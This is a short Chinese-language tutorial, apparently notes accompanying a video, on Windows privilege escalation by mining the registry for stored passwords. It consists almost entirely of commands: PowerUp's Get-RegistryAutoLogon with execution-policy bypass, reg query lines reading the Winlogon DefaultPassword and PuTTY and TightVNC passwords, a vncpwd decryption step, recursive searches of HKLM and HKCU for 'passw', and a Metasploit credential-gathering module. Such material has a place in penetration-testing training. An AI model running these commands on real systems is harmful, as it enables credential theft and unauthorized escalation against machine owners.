注册表密码挖掘的提权
视频教程:https://www.acfun.cn/v/ac13017016
自动登陆密码
| powershell -nop -ep bypass Import-Module C:\Users\user\Desktop\PowerUp.ps1 Get-RegistryAutoLogon #查找注册表中自动登陆的密码 --- 1. reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUsername 2. reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
|
软件密码
| 3. reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42 -v ProxyUsername 4. reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42 -v ProxyPassword 5. reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v Password 6. reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v PasswordViewOnly C:\Users\User\Desktop\Tools\vncpwd\vncpwd.exe 加密后的密码 cmd面板 右键mark
|
编写注册表脚本自动登陆
| Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "AutoAdminLogon"="1" "DefaultUserName"="自动登陆的用户名" "DefaultDomainName"="0" "DefaultPassword"="自动登陆的用户密码"
|
修改自动登陆的用户密码会发生什么?
搜索注册表所有密码
| reg query HKLM /f passw /t REG_SZ /s reg.exe query HKCU /f passw /t REG_SZ /s
|
msfconsole
search post/windows/gather/credentials/windows_autologin